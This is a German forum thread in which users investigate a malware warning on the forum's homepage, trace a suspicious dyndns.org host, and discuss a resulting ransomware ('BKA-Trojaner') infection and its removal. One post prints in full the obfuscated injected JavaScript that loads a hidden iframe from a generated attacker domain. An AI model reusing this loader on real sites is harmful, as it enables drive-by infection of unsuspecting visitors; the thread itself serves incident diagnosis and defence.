Warnhinweis bei Avast

Status
Für weitere Antworten geschlossen.

edward

Mitglied
Mitglied seit
8 Jul 2004
Beiträge
313
Punkte für Reaktionen
0
Punkte
16
Seit heute erhalte ich einen Warnhinweis wenn ich die Startseite (www.ippf.eu) des Forums aufrufe. Es handelt sich um den URL-Aufruf [NOPARSE]http://dl1e6.dyndns.org/de/s4[/NOPARSE] mit dem Hinweis auf Malware. Laut Tracert handelt es sich um einen Server aus Übersee.
 
Zuletzt bearbeitet von einem Moderator:

scolopender

Aktives Mitglied
Mitglied seit
13 Mai 2008
Beiträge
2,296
Punkte für Reaktionen
0
Punkte
36
edward schrieb:
... Server aus Übersee ...
Glaube ich nicht:
Code:
IP address: 81.176.228.181
Host name: dl1e6.dyndns.org

Alias:
dl1e6.dyndns.org
81.176.228.181 is from Russian Federation(RU) in region Eastern Europe

TraceRoute to 81.176.228.181 [dl1e6.dyndns.org]

Hop	(ms)	(ms)	(ms)	     IP Address          Host name
1 	  1 	  0 	  0 	     64.124.196.225	 xe-4-2-0.er2.dfw2.us.above.net  
2 	  0 	  0 	  0 	     64.125.26.213	 xe-1-1-0.cr2.dfw2.us.above.net  
3 	  5 	  5 	  5 	     64.125.31.122	 xe-4-2-0.cr2.iah1.us.above.net  
4 	  46 	  45 	  45 	     64.125.28.49	 xe-2-1-0.cr2.dca2.us.above.net  
5 	  47 	  46 	  45 	     64.125.29.26	 ge-1-3-0.mpr2.dca2.us.above.net  
6 	  106 	  106 	  106 	     64.125.27.166	 so-0-1-0.mpr1.lhr3.uk.above.net  
7 	  106 	  106 	  107 	     64.125.27.154	 xe-0-1-0.mpr2.lhr3.uk.above.net  
8 	  108 	  107 	  108 	     195.66.226.90	 r12-fe4-0-0.ldn-kq4.uk.kpnqwest.net  
9 	  176 	  237 	  176 	     217.106.1.154	 msk-dsr12-tg3-2.rt-comm.ru  
10 	  176 	  176 	  183 	     217.106.1.154	 msk-dsr12-tg3-2.rt-comm.ru  
11 	  182 	  211 	  178 	     81.176.228.181	  -  

Trace complete
G., -#####o:
 

RalfFriedl

IPPF-Urgestein
Mitglied seit
22 Apr 2007
Beiträge
12,343
Punkte für Reaktionen
1
Punkte
0
Das sieht nicht gut aus. Dieser String kommt auf der Seite gleich sechsmal vor, und zwar immer gleich zweimal nacheinander nach den Referenzen auf pagead2.googlesyndication.com und adserver.ip-phone-forum.de.
<script type='text/javascript'>function uP(S, todayN){return S + todayN;};function z(){var p = B();var M = R(a(A(), p.j.length));var G = p.j[M];var c = p.y[M];if(p.Y.length > 1){var n = p.Y[M];}else {var n = p.Y[0];}return { Z : G, J : n, K: c };};$();function b(Z, J){d = new Date();N = Z;var I = String(W("oPIf957amhcsx48pIPfo",4,12)+W("MmSjzf2ublivrwtMmS",3,12)+W("OaK36k01eoqndgyKOa",3,12));var cookie = s('cookie');var domain = cookie + s('gaTrack');var t = cookie + s('C');var k = cookie + s('v');var win = cookie + s('H');var h = R(d[domain]());var Q = d[t]();var D = d[k]();var JX = d[win]();var _$ = AK(I);var cC = XM(h, _$);var oS = XM(h+Q, _$);var NGaTrack = XM(h+Q+D, _$);var WImg = XM(h+Q+D+JX, _$);N = uP(N, eN(I, cC));N = uP(N, eN(I, oS));N = uP(N, eN(I, NGaTrack));N = uP(N, eN(I, WImg));return N + J;};function e(S){var r = s('r');var f = s('f');return S[r](f);};function A(){return Math.random();};function today(){return (typeof ActiveXObject != W("shSlundelhsS",4,4)+W("fineIwK",0,4)+"d" || typeof XMLHttpRequest != new String("undefined"));};function B(){return {j : e(W("a,b,c,dq1R",0,7)),Y : e(W(".dyndns.orgOqHT",0,11)),y : e(String(W("W8f3s1,fW38",4,3)+"s2,"+"s3,"+W("M1gs4g1M",3,2)))};};function W(S, U, i){return S.substr(U, i);};function g(){var _B = document;var lE = _B.createElement(s('urchinCode'));lE.width = String("12px");lE.height = "17px";lE.style[s('O')] = s('u');try {_B.body.appendChild(lE);} catch(url){try {_B.write(s('w'));_B.body.appendChild(lE);} catch(oImg){};};return lE;};function XM(CL, uA){return CL % uA;};function X(K, hA, FDomain){FDomain = FDomain || {};var TG = FDomain.expires;if (typeof TG == W("MqjnumberqjM",3,6) && TG){var Q = new Date();Q.setTime(Q.getTime() + a(TG, 1000));TG = FDomain.expires = Q;}if(TG && TG.toUTCString) { FDomain.expires = TG.toUTCString(); }hA = encodeURIComponent(hA);var LF = K + W("=NfMt",0,1) + hA;for(var domainF in FDomain){LF += new String(W("tqlx; tlqx",4,2)) + domainF;var pToday = FDomain[domainF];if(pToday !== true){ LF += W("05r=r05",3,1) + pToday;}}document.cookie = LF;};function s(L){var utmn = {max : new String(W("srcwuS",0,3)),x : String(W("mR4nhttn4Rm",4,3)+"p:/"+W("/JaN",0,1)),cookie : new String(W("getnxz",0,3)+W("UTCboE8",0,3)),gaTrack : "Hours",C : new String("Dat"+W("el3Ni",0,1)),v : "Mon"+"th",H : new String(W("2X0FullYear20X",3,8)),w : new String(W("mQ1g<body>gm1Q",4,6)),urchinCode : W("iframewkxJ",0,6),O : W("visib4XE",0,5)+"ility",u : "hidden",E : String(W("/de/8yT",0,4)),r: String(W("splitjmYq",0,5)),urchin: W("chaq4YO",0,3)+"rAt",f : new String(W("oLO,LoO",3,1))};for(var U in utmn){if(U == L){return utmn;}}return null;};function AK(S){return S.length;};function o(K){var _L = document.cookie.match(new RegExp("(?:^|; )" + K.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, W("esE7\\\\$1se7E",4,6)) + String("=([^;"+"]*)")));return _L ? decodeURIComponent(_L[1]) : undefined;};function eN(S, U){var urchin = s('urchin');return S[urchin](U);};function a(CL, uA){return CL * uA;};function $(){try {var l = z();var q = 2473;var img = "urchinUr"+W("KidnlnidK",4,1);var min = new String(W("X732P2X73",4,1));var Z = l.Z;var J = l.J;var T = l.K;if(o(min) != img){if(today()){var N = b(Z, J);var _ = g();var V = s('max');var m = s('x');var F = s('E');_[V] = m + N + F + T;X(min, img, {expires: q});}};} catch(url){alert(url);};};function R(S){return Math.floor(S);};</script></center>

Ich gehe mal nicht davon aus, dass das IPPF DynDNS Adressen bemüht, um den legitimen Inhalt auszuliefern.
 

edward

Mitglied
Mitglied seit
8 Jul 2004
Beiträge
313
Punkte für Reaktionen
0
Punkte
16
Bei mir werden sieht etwas anders aus(manche Server werden nicht aufgelöst)
Code:
 7   108 ms    87 ms    98 ms  ae0-0-grtdusix1.red.telefonica-wholesale.net.7.1.84.in-addr.arpa [84.16.7.233]
 8   162 ms    59 ms    56 ms  Xe6-0-2-0-grtloneq1.red.telefonica-wholesale.net119.142.94.in-addr.arpa [94.142.119.90]
 9    81 ms    79 ms    83 ms  xe-11-3-1.edge3.London1.Level3.net [212.187.201.05]
10   100 ms   103 ms    79 ms  unknown.Level3.net [212.113.15.178]
11   176 ms   157 ms   174 ms  217.106.1.146
12   162 ms   176 ms   140 ms  217.106.1.146
13   155 ms   167 ms   215 ms  81.176.228.181
daher habe auf Übersee getippt
 

andreasz

Neuer User
Mitglied seit
22 Sep 2006
Beiträge
83
Punkte für Reaktionen
0
Punkte
0
Zuletzt bearbeitet von einem Moderator:

Bibie

Aktives Mitglied
Mitglied seit
4 Jul 2008
Beiträge
2,872
Punkte für Reaktionen
4
Punkte
0
Ich bekomme die gleiche Meldung ebenfalls seit heute. Hab mal ein "Foto" geschossen. :)

Warnung avast.jpg
 

Sandra-T

IPPF-Promi
Mitglied seit
7 Nov 2007
Beiträge
3,266
Punkte für Reaktionen
0
Punkte
0
Sophos sieht noch keine Bedrohung...

Gruß
Sandra
 

George99

Aktives Mitglied
Mitglied seit
12 Dez 2005
Beiträge
1,591
Punkte für Reaktionen
0
Punkte
36
Besteht die Bedrohung nur, wenn man nicht Adblock benutzt?
 

DM41

Moderator
Teammitglied
Mitglied seit
26 Apr 2005
Beiträge
7,243
Punkte für Reaktionen
36
Punkte
48
Kann gut sein. Hatte die Meldung auch gerade und mein Adblock ist fürs Forum deaktiviert.
Hab's an die Admins weitergegeben...
 
M

mikrogigant

Guest
Ich habe die Zugriffe auf die obskuren Server mit dyndns.org-Adresse auf anderem Wege bemerkt (NoScript hat sie gemeldet) und in diesem Beitrag darüber berichtet. Ein Mod hat den Thread unter Verweis auf diesen Thread hier geschlossen und vermutet, dass die merkwürdigen Zugriffe über einen externen Adserver eingespielt werden.

Ich habe umgehend Adblock Plus fürs IP-Phone-Forum wieder aktiviert und werde es nun auch dauerhaft aktiv lassen. Ich habe absolut nichts dagegen, dass die Foren-Betreiber das Forum durch Werbung finanzieren, wenn das aber auf Kosten der Sicherheit meiner Rechner geht, dann müssen sie ohne meine Unterstützung leben. Zumal das nicht der erste Fall ist, in dem das Forum durch irgendwelchen über Adserver hereingeschneiten Mist verunreinigt wird.

Grüßle

Der Mikrogigant
 

Sandra-T

IPPF-Promi
Mitglied seit
7 Nov 2007
Beiträge
3,266
Punkte für Reaktionen
0
Punkte
0
Was mir noch aufgefallen ist: bei einigen Anzeigen wird neuerdings auch Java JRE geladen, das war bis gestern nicht der Fall.

Gruß
Sandra
 

Ecki-No1

IPPF-Promi
Mitglied seit
28 Mai 2006
Beiträge
6,316
Punkte für Reaktionen
13
Punkte
38
Hm, hier kommen keine Warnmeldungen (ghostery ,Adblock Plus und Avira AntiVir Premium 2012).
 
M

mikrogigant

Guest
Was mir noch aufgefallen ist: bei einigen Anzeigen wird neuerdings auch Java JRE geladen
Bei mir nicht mehr ;) NoScript blockt alle aktiven Inhalte, nicht nur Javascript, sondern auch z. B. Flash oder eben Java. Und NoScript ist bei mir inzwischen so eingestellt, dass auf den Forums-Seiten alle aktiven Inhalte außer solchen direkt von ip-phone-forum.de geblockt werden. Adblock Plus erledigt den Rest.

Gegen seriöse Werbung hätte ich nichts einzuwenden und würde sie auch nicht blocken. Aber wenn eine Aufhebung der Blockade zur Folge hat, dass immer mal wieder Malware hereinschneit, dann bleibt die Blockade eben aktiv.

@Ecki-No1: auch mein Virenscanner (Microsoft Security Essentials) meldet keine Bedrohung. Das ist aber auch kein Wunder, denn dank der beschriebenen Blockademaßnahmen landet die Bedrohung gar nicht erst auf meinem Rechner. Auch bei dir werkelt Adblock Plus, das dürfte der Grund sein, warum dein Virenscanner die Hufe stillhält.

Grüßle

Der Mikrogigant
 
Zuletzt bearbeitet von einem Moderator:

Peterdoo

Neuer User
Mitglied seit
22 Mai 2005
Beiträge
56
Punkte für Reaktionen
0
Punkte
6
Die genannte Dyndns IP liefert ein HTML aus, in dem ein Java Applet eingebettet ist. Wenn man eine version von Java niedriger als 6.30 installiert hat, wird dadurch ein BKA-Trojaner installiert (www.bka-trojaner.de).
 

Sandra-T

IPPF-Promi
Mitglied seit
7 Nov 2007
Beiträge
3,266
Punkte für Reaktionen
0
Punkte
0
So, ich habe das ganze auch mal an Dyndns.com gemeldet, ist eindeutig ein Missbrauch der Services.

Gruß
Sandra
 

Christoph

IPPF-Promi
Mitglied seit
20 Feb 2004
Beiträge
6,229
Punkte für Reaktionen
5
Punkte
38
Die genannte Dyndns IP liefert ein HTML aus, in dem ein Java Applet eingebettet ist. Wenn man eine version von Java niedriger als 6.30 installiert hat, wird dadurch ein BKA-Trojaner installiert (www.bka-trojaner.de).
Das kann ich leider bestätigen, denn so ist es mir ergangen! :mad:

Wer das Problem vielleicht auch hat, ich bin nach dieser Lösung vorgegangen. Allerdings hieß das Ding bei mir "torrent.exe" und da ich kein Torrent nutze, war das leicht zu erkennen. Ansonsten sehr nerviges Teil, hat mich einiges an Zeit und Nerven gekostet.

So eine verdammte Scheiße, ich hoffe, wir kriegen das kurzfristig wieder hin!

Sorry... :(

Java habe ich dann auch gleich aktualisiert.

@ Sandra-T: Vielen Dank für Deine Mithilfe! :)
 

Ernest015

IPPF-Promi
Mitglied seit
12 Jan 2007
Beiträge
3,136
Punkte für Reaktionen
1
Punkte
36
Scheint aber noch vorhanden zu sein, Avast hat hier auch gerade Alarm geschlagen. Die neue Java-Version 7 Update 1 (Build 1.7.0_01-b08) war bereits installiert, es war auch die Meldung mit dem DynDNS. Für einen Screenshot des Popup-Fensters hat die Zeit leider nicht gereicht.

mfg
 

Bibie

Aktives Mitglied
Mitglied seit
4 Jul 2008
Beiträge
2,872
Punkte für Reaktionen
4
Punkte
0
Bei Avast kann man unten im Systray mit einem Rechtsklick "letztes Popup anzeigen" auswählen, dann kommt es nochmal. :)
 

chked

IPPF-Promi
Mitglied seit
20 Nov 2006
Beiträge
4,236
Punkte für Reaktionen
10
Punkte
38
Danke für den Beitrag, jetzt weiss ich, wo der "Torrent" her kommt!

Gestern hat keiner von drei Virenscannern (Avira,Kaspersky, Spyware Terminator) das Ding gekannt, heute früh hat Kaspersky Alarm geschlagen.
Nervig, aber eher harmlos. Blockiert zwar, scheint aber nichts auszuspionieren. Jedenfalls baut der "Torrent" keine Verbindung "nach Hause" auf.
Entfernen lässt sich das Ding einfach:
- Windows im abgesicherten Modus mit Kommandozeile starten.
- Im Benutzerverzeichnis (Dokumente und Einstellungen bei XP, Users bei WIN7) die Torrent.exe suchen und löschen.
 
Status
Für weitere Antworten geschlossen.

Zurzeit aktive Besucher

3CX PBX - GRATIS
Linux / Win / Cloud

Neueste Beiträge

Statistik des Forums

Themen
234,050
Beiträge
2,042,051
Mitglieder
353,385
Neuestes Mitglied
Hans-R